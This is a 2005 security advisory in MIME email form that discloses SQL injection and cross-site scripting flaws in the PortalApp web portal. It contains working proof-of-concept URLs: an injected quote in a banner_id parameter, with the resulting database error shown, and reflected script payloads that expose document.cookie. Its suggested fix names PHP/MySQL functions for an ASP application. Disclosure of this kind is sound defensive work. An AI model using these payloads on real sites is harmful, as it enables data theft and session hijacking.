Multiple SQL injection and cross site scripting vulnerabilities have been discovered in PortalApp. Sample exploitation provided.
ef8774a270f7cf5c3c385dd44115e3f3ab80760745b1a26d5d9c111db428ebee
This is a multi-part message in MIME format.
------=_NextPart_000_0046_01C53454.58BFA8E0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Severity: Medium
Title: Multiple sql injection, and xss vulnerabilities in PortalApp.
Date: March 30, 2005
Vendor: AspApp
Vendor site: http://www.aspapp.com
Summary:
There are multiple sql injection, xss vulnerabilities in the PortalApp.
Proof of Concept Exploits:
http://localhost/ad_click.asp?banner_id=3D'SQL_INJECTION
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'banner_id =3D =
'SQL_INJECTION'.
/ad_click.asp, line 14
http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealert(docume=
nt.cookie)%3C/script%3E
Pops cookie
http://localhost/content.asp?do_search=3D1&keywords=3D'%3E%3Cscript%3Eale=
rt(document.cookie)%3C/script%3E
Pops cookie
Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), =
mysql_real_escape_string() and other functions for input validation =
before passing user input to the mysql database, or before echoing data =
on the screen, would solve these problems.
Author:
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =
Lookout for my soon to come out book on Secure coding with php.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM
n0K6nk2uxIlFknfglJIoUkqq
=3DV5fo
-----END PGP SIGNATURE-----
------=_NextPart_000_0046_01C53454.58BFA8E0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff><FONT face=3DArial size=3D2>
<DIV><BR>-----BEGIN PGP SIGNED MESSAGE-----<BR>Hash: SHA1</DIV>
<DIV> </DIV>
<DIV>Dcrab 's Security Advisory<BR><A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A><BR><A=20
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
/DIV>
<DIV> </DIV>
<DIV>Severity: Medium<BR>Title: Multiple sql injection, and xss=20
vulnerabilities in PortalApp.<BR>Date: March 30, =
2005<BR>Vendor:=20
AspApp<BR>Vendor site: <A=20
href=3D"http://www.aspapp.com">http://www.aspapp.com</A></DIV>
<DIV> </DIV>
<DIV>Summary:<BR>There are multiple sql injection, xss vulnerabilities =
in the=20
PortalApp.</DIV>
<DIV> </DIV>
<DIV>Proof of Concept Exploits:</DIV>
<DIV> </DIV>
<DIV><A=20
href=3D"http://localhost/ad_click.asp?banner_id=3D'SQL_INJECTION">http://=
localhost/ad_click.asp?banner_id=3D'SQL_INJECTION</A><BR>Microsoft=20
JET Database Engine error '80040e14'</DIV>
<DIV> </DIV>
<DIV>Syntax error in string in query expression 'banner_id =3D=20
'SQL_INJECTION'.</DIV>
<DIV> </DIV>
<DIV>/ad_click.asp, line 14</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealer=
t(document.cookie)%3C/script%3E">http://localhost/content.asp?contenttype=
=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A><BR>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://localhost/content.asp?do_search=3D1&keywords=3D'%3E%3C=
script%3Ealert(document.cookie)%3C/script%3E">http://localhost/content.as=
p?do_search=3D1&keywords=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/=
script%3E</A><BR>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR>Possible fix: The usage of htmlspeacialchars(), =
mysql_escape_string(),=20
mysql_real_escape_string() and other functions for input validation =
before=20
passing user input to the mysql database, or before echoing data on the =
screen,=20
would solve these problems.</DIV>
<DIV> </DIV>
<DIV>Author:<BR>These vulnerabilties have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A>.=20
Lookout for my soon to come out book on Secure coding with php.</DIV>
<DIV> </DIV>
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =
for=20
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>
<DIV> </DIV>
<DIV>iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM<BR>=
n0K6nk2uxIlFknfglJIoUkqq<BR>=3DV5fo<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>
------=_NextPart_000_0046_01C53454.58BFA8E0--